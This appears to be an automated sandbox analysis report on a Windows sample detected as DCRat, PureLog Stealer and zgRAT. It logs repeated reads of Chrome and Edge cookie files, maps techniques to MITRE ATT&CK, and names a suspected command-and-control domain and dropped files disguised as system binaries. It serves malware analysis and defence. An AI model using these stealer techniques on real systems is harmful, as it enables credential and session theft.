                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: jW5TA1J9Z1.exe PID: 3036, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: jW5TA1J9Z1.exe PID: 7840, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 7964, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: jW5TA1J9Z1.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.jW5TA1J9Z1.exe.630000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1237730669.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\AppReadiness\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: jW5TA1J9Z1.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.jW5TA1J9Z1.exe.630000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\AppReadiness\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts141
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              DLL Side-Loading                              		12
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory134
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt31
                              Registry Run Keys / Startup Folder                              		31
                              Registry Run Keys / Startup Folder                              		2
                              Obfuscated Files or Information                              		Security Account Manager331
                              Security Software Discovery                              		SMB/Windows Admin Shares1
                              Clipboard Data                              		12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Software Packing                              		NTDS2
                              Process Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading                              		LSA Secrets251
                              Virtualization/Sandbox Evasion                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion                              		Cached Domain Credentials1
                              Application Window Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items333
                              Masquerading                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                              Virtualization/Sandbox Evasion                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1496460 Sample: jW5TA1J9Z1.exe Startdate: 21/08/2024 Architecture: WINDOWS Score: 100 65 373292cm.nyashka.top 2->65 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Antivirus detection for dropped file 2->73 75 14 other signatures 2->75 8 jW5TA1J9Z1.exe 10 39 2->8         started        12 RuntimeBroker.exe 2->12         started        14 dwm.exe 2->14         started        16 10 other processes 2->16 signatures3 process4 file5 49 C:\Windows\...\MQYzEFytUKABjmoxvNTPTwUrcL.exe, PE32 8->49 dropped 51 C:\Windows\DiagTrack\RuntimeBroker.exe, PE32 8->51 dropped 53 C:\Windows\AppReadiness\RuntimeBroker.exe, PE32 8->53 dropped 55 13 other malicious files 8->55 dropped 79 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->79 81 Creates an undocumented autostart registry key 8->81 83 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 8->83 87 4 other signatures 8->87 18 cmd.exe 1 8->18         started        20 csc.exe 4 8->20         started        24 csc.exe 4 8->24         started        85 Multi AV Scanner detection for dropped file 12->85 signatures6 process7 file8 26 jW5TA1J9Z1.exe 14 904 18->26         started        31 w32tm.exe 1 